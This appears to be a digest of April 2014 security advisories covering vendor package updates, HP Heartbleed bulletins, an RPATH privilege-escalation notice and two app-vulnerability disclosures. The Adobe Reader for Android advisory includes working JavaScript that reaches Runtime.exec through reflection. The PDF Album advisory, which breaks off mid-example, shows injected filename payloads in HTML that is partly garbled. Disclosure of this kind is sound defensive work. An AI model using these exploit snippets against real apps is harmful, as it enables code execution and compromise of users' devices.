[ MDVSA-2014:077 ] jbigkit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:077 http://www.mandriva.com/en/support/security/ ___ Package : jbigkit Date: April 11, 2014 Affected: Business Server 1.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been discovered and corrected in jbigkit: Stack-based buffer overflow in the jbg_dec_in function in libjbig/jbig.c in JBIG-KIT before 2.1 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted image file (CVE-2013-6369). The updated packages for mbs1 have been upgraded to the 2.1 version and the packages for mes5 has been patched to resolve this security flaw. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6369 ___ Updated Packages: Mandriva Enterprise Server 5: 9d8c91789c60da3fecee77a49c5310d4 mes5/i586/jbigkit-1.6-3.1mdvmes5.2.i586.rpm d5a2dc7d87e77464ab16db94580a21bf mes5/i586/libjbig0-1.6-3.1mdvmes5.2.i586.rpm e84cd3d872276cf4e07c6c5492be8da4 mes5/i586/libjbig-devel-1.6-3.1mdvmes5.2.i586.rpm 0ec0e8efa6cb3ec0d677168fcde7fda6 mes5/SRPMS/jbigkit-1.6-3.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: d58973e5576172f17a9ef08141112d4a mes5/x86_64/jbigkit-1.6-3.1mdvmes5.2.x86_64.rpm e42a0cb60c9d42d279c7c5956c3b71be mes5/x86_64/lib64jbig0-1.6-3.1mdvmes5.2.x86_64.rpm f2acf671b84073f40d4c315c0c86de2c mes5/x86_64/lib64jbig-devel-1.6-3.1mdvmes5.2.x86_64.rpm 0ec0e8efa6cb3ec0d677168fcde7fda6 mes5/SRPMS/jbigkit-1.6-3.1mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: 30ffc8bc9b2f93e101a74bc6c369c251 mbs1/x86_64/jbigkit-2.1-1.mbs1.x86_64.rpm f929555b46784a872d5d724b6ec9ee36 mbs1/x86_64/lib64jbig1-2.1-1.mbs1.x86_64.rpm 77f06c19a1d3b07b5c3378171fddb89c mbs1/x86_64/lib64jbig-devel-2.1-1.mbs1.x86_64.rpm a322f2709a5c5263c1ff6364c580329c mbs1/SRPMS/jbigkit-2.1-1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFTSAunmqjQ0CJFipgRAq30AJ428RwdftMOnrJdYwzAipJcvi5yUQCeOeib ga95S+kznGtC4ioov0jP0+s= =N4Om -END PGP SIGNATURE-
[SECURITY] [DSA 2901-1] wordpress security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2901-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso April 12, 2014 http://www.debian.org/security/faq - - Package: wordpress CVE ID : CVE-2014-0165 CVE-2014-0166 Debian Bug : 744018 Several vulnerabilities were discovered in Wordpress, a web blogging tool. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2014-0165 A user with a contributor role, using a specially crafted request, can publish posts, which is reserved for users of the next-higher role. CVE-2014-0166 Jon Cave of the WordPress security team discovered that the wp_validate_auth_cookie function in wp-includes/pluggable.php does not properly determine the validity of authentication cookies, allowing a remote attacker to obtain access via a forged cookie. For the oldstable distribution (squeeze), these problems have been fixed in version 3.6.1+dfsg-1~deb6u2. For the stable distribution (wheezy), these problems have been fixed in version 3.6.1+dfsg-1~deb7u2. For the testing distribution (jessie), these problems have been fixed in version 3.8.2+dfsg-1. For the unstable distribution (sid), these problems have been fixed in version 3.8.2+dfsg-1. We recommend that you upgrade your wordpress packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJTSaAGAAoJEAVMuPMTQ89E16kP/1qPSwTsXOAOcRW0si9TILJQ dJfqgQNhaUom4c0Z1+OtGVV7i0APlznGFCK2xX3KVyAGP9OWKbc+jiYAkGYmMskh 5+Vk4La4g8qrDQjc3D82q+dW8KgO8oPPCVX6nF5FpPcliMykCs6Zlx+XcGtgBmTM EnRs2fIA2dVWI/N1gV8+yOrYoU4ixUfWqUdI1qgn5r310JN0pVVYLPD/rwjUmj3w /m2qM35tK0+cpSpPbN+P0KJSucVGRVvZKsMIJF+lbD9jM59Ig2GWgLFIti76C7Sz D1kLb9lCUBFB/5qvRa76ljYLG/U1tQHNP8QqDddohHxm+nmyT6lMvFhYOH+TJBh/ Y6xFPaZLsLwQmz2T6z355C8itJhhdclU1gRmnNHHBCWe1LtJi52x8sLhotkSbN6T nD/K6iv/gwOal4jgHjeLo9vkepbOWI6cZ3uZpxnZScfTS383LIFJ8DijCEnu5FPx BJAb7HtQyYjCM5BJjzy0bP6b/EyHR49iuQ+WIAFhgiBkBqBON2q+ipGMgPs7EJBN mc1TfO9IYBBJJYbep4UDho4wOYhzR6308PBm5kRWd6E7D+K5otJkKIsL76iTHDSc 846Mo9bi55jrRHSCMHwzqTKp1bj4PTsAlY//bYTevyye6zSfDxok6951k0qVMFSA SV9zn6ftutk6v9J25cpr =ewsD -END PGP SIGNATURE-
[SECURITY] [DSA 2902-1] curl security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2902-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso April 13, 2014 http://www.debian.org/security/faq - - Package: curl CVE ID : CVE-2014-0138 CVE-2014-0139 Debian Bug : 742728 Two vulnerabilities have been discovered in cURL, an URL transfer library. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2014-0138 Steve Holme discovered that libcurl can in some circumstances re-use the wrong connection when asked to do transfers using other protocols than HTTP and FTP. CVE-2014-0139 Richard Moore from Westpoint Ltd. reported that libcurl does not behave compliant to RFC 2828 under certain conditions and incorrectly validates wildcard SSL certificates containing literal IP addresses. For the oldstable distribution (squeeze), these problems have been fixed in version 7.21.0-2.1+squeeze8. For the stable distribution (wheezy), these problems have been fixed in version 7.26.0-1+wheezy9. For the testing distribution (jessie), these problems have been fixed in version 7.36.0-1. For the unstable distribution (sid), these problems have been fixed in version 7.36.0-1. We recommend that you upgrade your curl packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJTSkcrAAoJEAVMuPMTQ89EJ/kQAI+bhYW6omGFeiXjY2dzZlJv oNrtpIiF73jwmQ35dKRbfNhl4rM1FHDoFN5TPWVN5nGdH3nxMmccsAUNFCz2R3z8 4L8qWGtJrAvwkUCYq8eVTVVlrW8G1wZgc/Eyzv2agenRgCuUl5YqqUd841ee2nGd BkDhnzASyk0iZL13FVWLj4jz7q/YUVh9+r1bS/gRKH2cGWjTgOthyUb2iPXUw37a 3/FMfTzj2n+1qbsTbTaP5HSIOX43is98PKbS0H+o11MOaeOxt2BAz1lM/Z/yGz+W eNnimJyM4dN1eUkhz8qXLkFVicBYp0ttYcUBDyQgQpE2IF29ULL4g9ZxeV0fraai EwbkoI5SYKeQFN3LQ8Q7iGqh+vyuUEkGXAGAnTrt/8xi0Gm42gMercYGHH6M/Qtq pGsaqrbMn793N8oSimiuhdbU3KN3UQo6fUYXzAqcjhnw1bdozz69ZWnuRo06j+yZ 87E8NrF+z1DkLba/e9CINAdGhFisu5LK5hS0mLLRk3MqoLIRe0AbmxsGwQRB2N3Z KGMphBKdcf/KiPRbqdTKzm7sDvjqiLuDfjxqu4BDIqZs5P/AHyETyeL6AgS2quws 0I1ufW452CdauJ00uHl7q0m2nd733bhuiHMCJ0boU+EQHJYLV0sj3U4vwGWRcIb6 8aoI57o9zT39JlGFWwbU =hzeM -END PGP SIGNATURE-
Adobe Reader for Android exposes insecure Javascript interfaces
Adobe Reader for Android exposes insecure Javascript interfaces
Yorick Koster, April 2014
Abstract
Adobe Reader for Android [2] exposes several insecure Javascript
interfaces. This issue can be exploited by opening a malicious PDF in
Adobe Reader. Exploiting this issue allows for the execution of
arbitrary Java code, which can result in a compromise of the documents
stored in Reader and files stored on SD card.
Tested versions
This issue was successfully verified on Adobe Reader for Android
version 11.1.3.
Fix
Adobe released version 11.2.0 of Adobe Reader that add
@JavascriptInterface [3] annotations to public methods that should be
exposed in the Javascript interfaces. In addition, the app now targets
API Level 17 and contains a static method
(shouldInitializeJavaScript()) that is used to check the device's
Android version.
http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png
Figure 1: Adobe Reader for Android 11.2.0 release notes
Introduction
Adobe Reader for Android allows users to work with PDF documents on an
Android tablet or phone. According to Google Play, the app is installed
on 100 million to 500 million devices.
The following classes expose one or more Javascript interfaces:
- ARJavaScript
- ARCloudPrintActivity
- ARCreatePDFWebView
The app targets API Level 10, which renders the exposed Javascript
interfaces vulnerable to code execution - provided that an attacker
manages to run malicious Javascript code within Adobe Reader.
PDF Javascript APIs
It appears that Adobe Reader for Mobile supports [4] a subset of the
Javascript for Acrobat APIs. For some reason the exposed Javscript
objects are prefixed with an underscore character.
public class ARJavaScript
{
[...]
public ARJavaScript(ARViewerActivity paramARViewerActivity)
{
[...]
this.mWebView.addJavascriptInterface(new
ARJavaScriptInterface(this),
_adobereader);
this.mWebView.addJavascriptInterface(new
ARJavaScriptApp(this.mContext), _app);
this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(),
_doc);
this.mWebView.addJavascriptInterface(new
ARJavaScriptEScriptString(this.mContext), _escriptString);
this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(),
_event);
this.mWebView.addJavascriptInterface(new ARJavaScriptField(),
_field);
this.mWebView.setWebViewClient(new ARJavaScript.1(this));
this.mWebView.loadUrl(file:///android_asset/javascript/index.html);
}
An attacker can create a specially crafted PDF file containing
Javascript that runs when the target user views (or interacts with)
this PDF file. Using any of the Javascript objects listed above
provides the attacker access to the public Reflection APIs inherited
from Object. These APIs can be abused to run arbitrary Java code.
Proof of concept
The following proof of concept [5] will create a text file in the app
sandbox.
function execute(bridge, cmd) {
return bridge.getClass().forName('java.lang.Runtime')
.getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
if(window._app) {
try {
var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
execute(window._app, ['/system/bin/sh','-c','echo \Lorem
ipsum\ '
+ path]);
window._app.alert(path + ' created', 3);
} catch(e) {
window._app.alert(e, 0);
}
}
References
[1]
http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html
[2] https://play.google.com/store/apps/details?id=com.adobe.reader
[3]
http://developer.android.com/reference/android/webkit/JavascriptInterface.html
[4]
http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis
[5] http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf
[security bulletin] HPSBMU02995 rev.2 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, and
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04236102 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04236102 Version: 2 HPSBMU02995 rev.2 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, and Performance Center, running OpenSSL, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-04-11 Last Updated: 2014-04-13 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY The Heartbleed vulnerability was detected in specific OpenSSL versions. OpenSSL is a 3rd party product that is embedded with some of HP Software products. This bulletin objective is to notify HP Software customers about products affected by the Heartbleed vulnerability. Note: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found in the OpenSSL product cryptographic software library product. This weakness potentially allows disclosure of information protected, under normal conditions, by the SSL/TLS protocol. The impacted products appear in the list below are vulnerable due to embedding OpenSSL standard release software. References: CVE-2014-0160 (SSRT101499) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Product Impacted HP Product Versions Notes HP Service Manager v9.32, v9.33 HP Asset Manager v9.40, v9.40 CSC HP UCMDB Browser v1.x, v2.x, v3.1 APR enabled on Tomcat includes an affected OpenSSL version HP UCMDB Configuration Manager v9.1x, v9.2x, v9.3x, v10.01, v10.10 HP CIT (ConnectIT) v9.52, v9.53 HP Executive Scorecard v9.40, v9.41 HP Server Automation v10.00, v10.01 HP Diagnostics v9.23, v9.23 IP1 HP LoadRunner v11.52, v12.0 Controller/load generator communication channel HP Performance Center v11.52, v12.0 Controller/load generator communication channel Impacted Versions table BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP Software is working to address this vulnerability for all affected product versions. HP Software will release product specific security bulletins for each impacted product. Each bulletin will include a patch and/or mitigation guideline. HP will update this bulletin with references to security bulletins for each product in the impacted versions table. Note: OpenSSL is an external product embedded in HP products. Bulletin Applicability: This bulletin applies to each OpenSSL component that is embedded within the HP products listed in the security bulletin. The bulletin does not apply to any other 3rd party application (e.g. operating system, web server, or application server) that may be required to be installed by the customer according instructions in the product install guide. To learn more about HP Software Incident Response, please visit http://www8.h p.com/us/en/software-solutions/enterprise-software-security-center/response-c enter.html . Software updates are available from HP Software Support Online at http://support.openview.hp.com/downloads.jsp HISTORY Version:1 (rev.1) - 11 April 2014 Initial release Version:2 (rev.2) - 13 April 2014 Added HP UCMDB Configuration Manager as impacted, updated HP UCMDB Browser impacted versions Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop
[security bulletin] HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04236062 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04236062 Version: 1 HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-04-13 Last Updated: 2014-04-13 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified in HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL. This is the OpenSSL vulnerability known as Heartbleed which could be exploited remotely resulting in disclosure of information. References: CVE-2014-0160, SSRT101500 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP BladeSystem c-Class Onboard Administrator (OA) v4.11 and 4.20 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP is actively working to address this vulnerability for the impacted versions of HP Onboard Administrator (OA). This bulletin will be revised when the software updates are released. Notes Customers also have the option to downgrade OA firmware to any version prior to OA v4.11 if that meets the requisite Hardware/feature support for the enclosure configuration. No action is required unless the OA is running the firmware versions explicitly listed as vulnerable. HISTORY Version:1 (rev.1) - 13 April 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVmEFACggs/Q1GaEsxwM9Vq17prvnMA9 zwsAn08KV2HUERq6QUThuGZ4USDSSh9S =ItbO -END PGP SIGNATURE-
[security bulletin] HPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04239372 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04239372 Version: 1 HPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-04-13 Last Updated: 2014-04-13 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP System Management Homepage (SMH) running on Linux and Windows. This is the OpenSSL vulnerability known as Heartbleed which could be exploited remotely resulting in disclosure of information. References: CVE-2014-0160, SSRT101501 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3, v7.3.1 for Linux and Windows BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP is actively working to address this vulnerability for the impacted versions of HP System Management Homepage (SMH). This bulletin will be revised when the software updates are released. Information and downloads for HP SMH can be found at the following location: http://h18013.www1.hp.com/products/servers/management/agents/index.html HISTORY Version:1 (rev.1) - 13 April 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnUpACgs06y+OxukBiWTHsJUzFVtUs8 aeYAn2YETGkjLUrH6Js44b/Lgl4J2nry =3CzH -END PGP SIGNATURE-
[security bulletin] HPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04239375 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04239375 Version: 1 HPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-04-13 Last Updated: 2014-04-13 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Smart Update Manager (SUM) running OpenSSL.This is the OpenSSL vulnerability known as Heartbleed which could be exploited remotely resulting in disclosure of information. References: CVE-2014-0160, SSRT101503 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Smart Update Manager (SUM) 6.0.0 through 6.3.0 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP is actively working to address this vulnerability for the impacted versions of HP Smart Update Manager (SUM). This bulletin will be revised when the software updates are released. Until the software updates are available, HP recommends limiting HP SUM usage to a secure and isolated private management network. HISTORY Version:1 (rev.1) - 13 April 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnCEgCgs9NE3ajD5WkXefc30WZhR/JQ gwkAoNoHbkxpxzqSry1ZLk2OkJIc3Tnk =jhjw -END PGP SIGNATURE-
CVE-2013-6216 - SetUID/SetGID Programs Allow Privilege Escalation Via Insecure RPATH in multiple HP products on Linux
Vulnerability title: SetUID/SetGID Programs Allow Privilege Escalation Via Insecure RPATH in HP Array Configuration Utility, HP Array Diagnostics Utility, HP ProLiant Array Diagnostics and SmartSSD Wear Gauge Utility Running on Linux CVE: CVE-2013-6216 Vendor: HP Product: HP Array Configuration Utility, HP Array Diagnostics Utility, HP ProLiant Array Diagnostics and SmartSSD Wear Gauge Utility Running on Linux Affected version: 9.40 Fixed version: N/A Reported by: Tim Brown Details: It has been identified that binaries that are executed with elevated privileges (SetGID and SetUID programs) have been compiled in manner that means they searched for libraries in insecure locations. An attacker could place a malicious library in one of the affected directories, which would then be loaded when the affected program is run, leading to privilege escalation in instances where the program runs with privileges that the attacker does not have. Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-6216/ Copyright: Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
PDF Album v1.7 iOS - File Include Web Vulnerability
Document Title: === PDF Album v1.7 iOS - File Include Web Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1255 Release Date: = 2014-04-11 Vulnerability Laboratory ID (VL-ID): 1255 Common Vulnerability Scoring System: 7.3 Product Service Introduction: === Here is a creative way to record an idea, a page in a book or newspapers, what you learned, even a travel memory. You can get content from camera, image or text editor, then pick them up into a pdf file and compose them as you wish. You can order the pages in project, then save the project and open it again when you want to add or change it. You can get pdfs via WIFI or read them in this app. (Copy of the Homepage: https://itunes.apple.com/ch/app/pdf-album/id590232990 ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official PDF Album v1.7 iOS mobile application. Vulnerability Disclosure Timeline: == 2014-04-11: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Lintao Zhao Product: PDF Album - iOS Mobile Application 1.7 Exploitation Technique: === Remote Severity Level: === High Technical Details Description: A local file include web vulnerability has been discovered in the official PDF Album v1.7 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the `pdf album index item` list context. The attacker can inject the local file include request by usage of the `wifi interface` or by a local privileged application user account via `folder sync`. Attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9. Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth. Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise. Request Method(s): [+] [POST] - Remote [+] [SYNC] - Local Vulnerable Module(s): [+] Browse File Upload Vulnerable Parameter(s): [+] filename.*.pdf Affected Module(s): [+] PDF Album - Index Item Listing (http://localhost:8808/) Proof of Concept (PoC): === The local file include web vulnerability can be exploited by local attackers with low privileged user account without required user interaction. For security demonstration or to reproduce the local file include vulnerability follow the provided information and steps below to continue. PoC: Exploit Code table cellpadding=0 cellspacing=0 border=0 thead trthName/thth class=delDelete/th/tr/thead tbody id=filelist trtda href=/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf class=file ./[LOCAL FILE INCLUDE VULNERABILITY VIA PDF ALBUMNAME!.pdf/a/tdtd class='del' form action='/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf' method='post'input name='_method' value='delete' type='hidden'/ input name=commit type=submit value=Delete class='button' //td/tr/tbody/table/iframe/a/td/tr tr class=shadowtda href=/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf class=file%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf/a/tdtd class=del form action=/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf method=post input name=_method value=delete type=hiddeninput name=commit value=Delete class=button 